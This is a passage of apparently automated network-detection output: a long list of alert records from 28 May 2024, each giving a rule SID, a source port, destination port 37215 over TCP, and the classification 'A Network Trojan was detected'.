            SID:2835222
            Source Port:41458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957002
            SID:2829579
            Source Port:45450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860506
            SID:2835222
            Source Port:47954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575355
            SID:2829579
            Source Port:58868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815669
            SID:2829579
            Source Port:57050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000223
            SID:2829579
            Source Port:55460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.081925
            SID:2835222
            Source Port:46216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994697
            SID:2835222
            Source Port:55654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929902
            SID:2835222
            Source Port:50618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941430
            SID:2829579
            Source Port:51336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323187
            SID:2835222
            Source Port:46726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507621
            SID:2835222
            Source Port:52792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876927
            SID:2829579
            Source Port:58978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987101
            SID:2835222
            Source Port:48558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665788
            SID:2835222
            Source Port:58466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.676652
            SID:2829579
            Source Port:58842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.850996
            SID:2835222
            Source Port:43260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469918
            SID:2835222
            Source Port:46338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587373
            SID:2829579
            Source Port:38552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892176
            SID:2835222
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988741
            SID:2835222
            Source Port:47028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840562
            SID:2829579
            Source Port:49478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779404
            SID:2829579
            Source Port:40160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870447
            SID:2829579
            Source Port:58606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311166
            SID:2829579
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876906
            SID:2829579
            Source Port:42680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061339
            SID:2835222
            Source Port:58302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559732
            SID:2829579
            Source Port:36666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969268
            SID:2835222
            Source Port:51374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765585
            SID:2829579
            Source Port:55290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853393
            SID:2835222
            Source Port:41352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048138
            SID:2829579
            Source Port:36662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308157
            SID:2835222
            Source Port:33058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807316
            SID:2829579
            Source Port:54614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832564
            SID:2835222
            Source Port:57144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756474
            SID:2829579
            Source Port:45302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597178
            SID:2829579
            Source Port:42906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026438
            SID:2829579
            Source Port:41330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922409
            SID:2829579
            Source Port:53956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735672
            SID:2829579
            Source Port:55686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759730
            SID:2829579
            Source Port:42484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735858
            SID:2835222
            Source Port:37362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905656
            SID:2829579
            Source Port:35070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.947554
            SID:2829579
            Source Port:55360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278040
            SID:2835222
            Source Port:47812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.927047
            SID:2835222
            Source Port:37416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349124
            SID:2835222
            Source Port:46690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435672
            SID:2835222
            Source Port:54566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543845
            SID:2829579
            Source Port:33998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029953
            SID:2835222
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926827
            SID:2835222
            Source Port:38516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743980
            SID:2835222
            Source Port:36542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804445
            SID:2829579
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414043
            SID:2829579
            Source Port:50290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922504
            SID:2829579
            Source Port:60904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557308
            SID:2835222
            Source Port:47820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304103
            SID:2829579
            Source Port:55446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327373
            SID:2829579
            Source Port:52280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714543
            SID:2829579
            Source Port:57324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.952094
            SID:2835222
            Source Port:51946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742414
            SID:2835222
            Source Port:48676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832736
            SID:2835222
            Source Port:54150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291226
            SID:2835222
            Source Port:51558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767544
            SID:2835222
            Source Port:47116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052854
            SID:2829579
            Source Port:52236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.628357
            SID:2835222
            Source Port:35994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543182
            SID:2829579
            Source Port:49818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350106
            SID:2829579
            Source Port:47526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312730
            SID:2829579
            Source Port:58646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605539
            SID:2829579
            Source Port:39998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879420
            SID:2835222
            Source Port:40074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263134
            SID:2835222
            Source Port:40002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.069736
            SID:2829579
            Source Port:49916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685072
            SID:2829579
            Source Port:48422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909210
            SID:2835222
            Source Port:34622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334333
            SID:2829579
            Source Port:39148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.654663
            SID:2835222
            Source Port:45846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025107
            SID:2835222
            Source Port:57576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.322496
            SID:2829579
            Source Port:37800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.814323
            SID:2835222
            Source Port:45716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754805
            SID:2829579
            Source Port:51790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291192
            SID:2835222
            Source Port:56078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507539
            SID:2829579
            Source Port:55992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599600
            SID:2829579
            Source Port:56096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086322
            SID:2829579
            Source Port:44028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872787
            SID:2829579
            Source Port:44616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562159
            SID:2835222
            Source Port:38092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875128
            SID:2829579
            Source Port:43388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855520
            SID:2829579
            Source Port:46332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563252
            SID:2829579
            Source Port:54136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.539982
            SID:2829579
            Source Port:56810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919489
            SID:2829579
            Source Port:59454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.013886
            SID:2835222
            Source Port:50678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852818
            SID:2829579
            Source Port:38658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299191
            SID:2829579
            Source Port:50298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070971
            SID:2829579
            Source Port:44046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560187
            SID:2835222
            Source Port:44738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760168
            SID:2835222
            Source Port:44718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336001
            SID:2835222
            Source Port:42560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862989
            SID:2829579
            Source Port:34706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943719
            SID:2835222
            Source Port:55328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727515
            SID:2829579
            Source Port:39680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915040
            SID:2835222
            Source Port:33148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766889
            SID:2835222
            Source Port:43844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748562
            SID:2829579
            Source Port:42144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951566
            SID:2835222
            Source Port:50010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748583
            SID:2835222
            Source Port:36142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290882
            SID:2835222
            Source Port:45774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733366
            SID:2829579
            Source Port:60862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865411
            SID:2829579
            Source Port:36086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.206610
            SID:2829579
            Source Port:50500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470849
            SID:2835222
            Source Port:59806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733671
            SID:2829579
            Source Port:39348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873517
            SID:2835222
            Source Port:60004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582721
            SID:2829579
            Source Port:46968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.835958
            SID:2835222
            Source Port:46374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.656187
            SID:2829579
            Source Port:52810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875263
            SID:2835222
            Source Port:34854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260908
            SID:2829579
            Source Port:47322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327190
            SID:2829579
            Source Port:33700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304125
            SID:2829579
            Source Port:36984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.520205
            SID:2835222
            Source Port:45814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031593
            SID:2835222
            Source Port:57502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739505
            SID:2829579
            Source Port:45386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309277
            SID:2829579
            Source Port:49278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738885
            SID:2829579
            Source Port:43300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967957
            SID:2829579
            Source Port:37326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482810
            SID:2829579
            Source Port:58278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811371
            SID:2829579
            Source Port:58444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871548
            SID:2835222
            Source Port:46702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984772
            SID:2835222
            Source Port:42550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436847
            SID:2835222
            Source Port:50578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446998
            SID:2829579
            Source Port:38870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930245
            SID:2835222
            Source Port:39544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786604
            SID:2829579
            Source Port:37134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746088
            SID:2835222
            Source Port:39182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873045
            SID:2835222
            Source Port:48152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047464
            SID:2829579
            Source Port:35626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.011171
            SID:2835222
            Source Port:48868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953277
            SID:2829579
            Source Port:40170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935015
            SID:2829579
            Source Port:57108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968414
            SID:2829579
            Source Port:37768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299926
            SID:2835222
            Source Port:37622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927036
            SID:2829579
            Source Port:41788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865508
            SID:2835222
            Source Port:35586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321350
            SID:2829579
            Source Port:33302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635119
            SID:2829579
            Source Port:39664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755745
            SID:2829579
            Source Port:34272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300079
            SID:2829579
            Source Port:51592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918076
            SID:2829579
            Source Port:37514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879652
            SID:2835222
            Source Port:35534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937400
            SID:2829579
            Source Port:56838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869664
            SID:2835222
            Source Port:40976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026891
            SID:2829579
            Source Port:50394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887583
            SID:2829579
            Source Port:60536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682167
            SID:2835222
            Source Port:51672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.775011
            SID:2835222
            Source Port:32976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720796
            SID:2829579
            Source Port:58022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743623
            SID:2829579
            Source Port:57748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756819
            SID:2835222
            Source Port:36248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336867
            SID:2835222
            Source Port:41456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923503
            SID:2829579
            Source Port:41024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956984
            SID:2835222
            Source Port:49992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622390
            SID:2829579
            Source Port:56018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716232
            SID:2835222
            Source Port:56360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.481084
            SID:2829579
            Source Port:33692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.025902
            SID:2835222
            Source Port:49734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731205
            SID:2835222
            Source Port:38716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.013896
            SID:2829579
            Source Port:34590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807231
            SID:2829579
            Source Port:40010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.964845
            SID:2829579
            Source Port:35002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804001
            SID:2829579
            Source Port:60570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843745
            SID:2829579
            Source Port:34680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935355
            SID:2835222
            Source Port:59100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812090
            SID:2829579
            Source Port:44054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231225
            SID:2829579
            Source Port:33200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851230
            SID:2829579
            Source Port:50774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920202
            SID:2829579
            Source Port:35518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059818
            SID:2835222
            Source Port:60424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762450
            SID:2829579
            Source Port:42744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743015
            SID:2835222
            Source Port:37016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470311
            SID:2829579
            Source Port:41228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617468
            SID:2829579
            Source Port:55706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893213
            SID:2829579
            Source Port:50066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556789
            SID:2835222
            Source Port:34656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.413848
            SID:2835222
            Source Port:58378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.632099
            SID:2835222
            Source Port:33474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311543
            SID:2829579
            Source Port:35762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542374
            SID:2829579
            Source Port:47062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872670
            SID:2829579
            Source Port:53778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319684
            SID:2835222
            Source Port:60644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852804
            SID:2835222
            Source Port:35474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915552
            SID:2829579
            Source Port:60216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946677
            SID:2835222
            Source Port:59592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182240
            SID:2835222
            Source Port:55520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811775
            SID:2829579
            Source Port:35478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279864
            SID:2829579
            Source Port:36672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388951
            SID:2835222
            Source Port:56182
            Destination Port:37215
